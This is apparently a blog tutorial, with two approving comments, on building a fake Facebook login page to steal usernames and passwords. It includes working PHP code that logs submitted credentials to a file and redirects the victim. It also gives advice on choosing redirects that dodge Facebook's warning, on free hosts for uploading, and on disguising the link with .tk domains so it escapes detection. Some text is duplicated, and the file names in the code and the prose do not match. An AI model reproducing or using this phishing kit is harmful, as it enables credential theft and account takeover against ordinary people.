WHAT IS PHISHING?
Phishing is a technique or a way of attempting to acquire sensitive or confidential information such as usernames, passwords, and credit card details by false pretence as a trustworthy entity in an electronic communication. This is done with the help of a phisher.
WHAT IS A PHISHER?
A phisher is something that looks exactly like an Original login page (fake page), that writes the victim's login data (Username and Password) to a specific file, or does whatever you want so long as you get access to the victim's login data.
Here is an example of a fake facebook login page (phisher)
HOW TO MAKE A PHISHER?
As the saying goes:
Therefore, instead of just giving you the download link to the already made phishing page,.. Am going to teach you how to make your own phishing page. Well, at the end of this tutorial, i will put a download link to my already made phishing pages but first you have to learn how to make your own phisher :DPhishing is a technique or a way of attempting to acquire sensitive or confidential information such as usernames, passwords, and credit card details by false pretence as a trustworthy entity in an electronic communication. This is done with the help of a phisher.
WHAT IS A PHISHER?
A phisher is something that looks exactly like an Original login page (fake page), that writes the victim's login data (Username and Password) to a specific file, or does whatever you want so long as you get access to the victim's login data.
Here is an example of a fake facebook login page (phisher)
HOW TO MAKE A PHISHER?
As the saying goes:
- Dont give plenty of FISH to your friend,. Instead, you should teach him how to PHISH
To create a successful phisher, all you need is a PHP enabled site , Notepad on your computer and a brain.
You can download Notepad v5.9++ here
Here is a list of php enabled free hosting sites:
- 110mb - http://110mb.com
- Ripway - http://ripway.com
- SuperFreeHost - http://superfreehost.info
- Freehostia - http://freehostia.com
- Freeweb7 - http://freeweb7.com
- t35 - http://t35.com
- Awardspace - http://awardspace.com
- PHPNet - http://phpnet.us
- Free Web Hosting Pro - http://freewebhostingpro.com
- ProHosts - http://prohosts.org
- FreeZoka - http://www.freezoka.com/
- 000webhost - http://000webhost.com/
- AtSpace - http://atspace.com
- My3gb - http://my3gb.com
STEP 1 -Creating the fake page
- Go to facebook's login page http://www.facebook.com
- On the top left corner of your Firefox browser, Click File ->Save page As and save your page name as facebook.html
- Open facebook.html Using Notepad and search for the word ''action''
class="menu_login_container"><form method="POST" action="https://ww w.facebook .com/login .php?login _attempt=1" id="login_form"
- Now change the method to ''get'' and action to ''login.php'' so that you will have something that looks like this;
STEP 2- Preparing the php script
- To Create a php file, simply pasting the code below into your notepad. Then save it as login.php
------------------------------------------------------------------------------
<?php
header("Location: http://facebook.com/login.php ");
$handle = fopen("noobs.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
------------------------------------------------------------------------------
Note that in the above script, ''phished.txt'' is the file on which all hacked usernames and passwords will be saved and ''https://facebook.com/login.php'' is the Original facebook url where your victim will be redircted to after clicking the login button on your fake page. But at the moment facebook has tightened its security where by your victim will get notified of a phishing attack and would therefore be prompted to change his password right after arriving from a phishing page.
To avoid this, you should redirect your victim to any other url which is not of facebook by replacing https://facebook.com/login.php with any url. Choosing the url to redirect your victim to will all depend on the trick that you will use against your victim in the whole phishing proccess.
Please also note that this part is mainly for facebook , its ok with several other sites like gmail, hotmail e.t.c your victim will not get a warning message, including mobile facebook (http://m.facebook.com).
STEP 3- Create File where to save hacked passwords
- Create an empty text file using notepad and rename it as phished
Note that when creating the text file, there is no need of renaming it as phished.txt because the fact that you will save it as a text file is enough to make it bear the extension of txt
Now you have 3 files so far;
- facebook.html
- login.php
- phished.txt
STEP 5- Uploading the 3 files
Now go to http://my3gb.com and sign up for a free hosting account the upload the 3 files as shown below
If your phisher has successfully been made, any email address and passwords that are typed on your fake page will be saved on the ''phished.txt'' file as shown in the image below
The link to your phishing page will therefore be;
www.yourusername.my3gb.com/facebook.html
NOTE THAT:
- No One will be so dumb to click on such a link
- Facebook will automaticaly block your phishing url from being posted on facebook
Your dot.tk domain name will look like this,... www.anyname.tk , any clicks on this link will be fowarded to your fake facebook page.
The good part is that..
- you can rename the phishing link to suite your victim's curiosity and there making it difficult for him to notice any phisher
- Your phisher will NOT be detected and blocked by facebook,..so you are free to post it or send it to a freind on facebook via inbox.
2 comments:
hahaha... nice post gan...
Thanx dude :xD
Post a Comment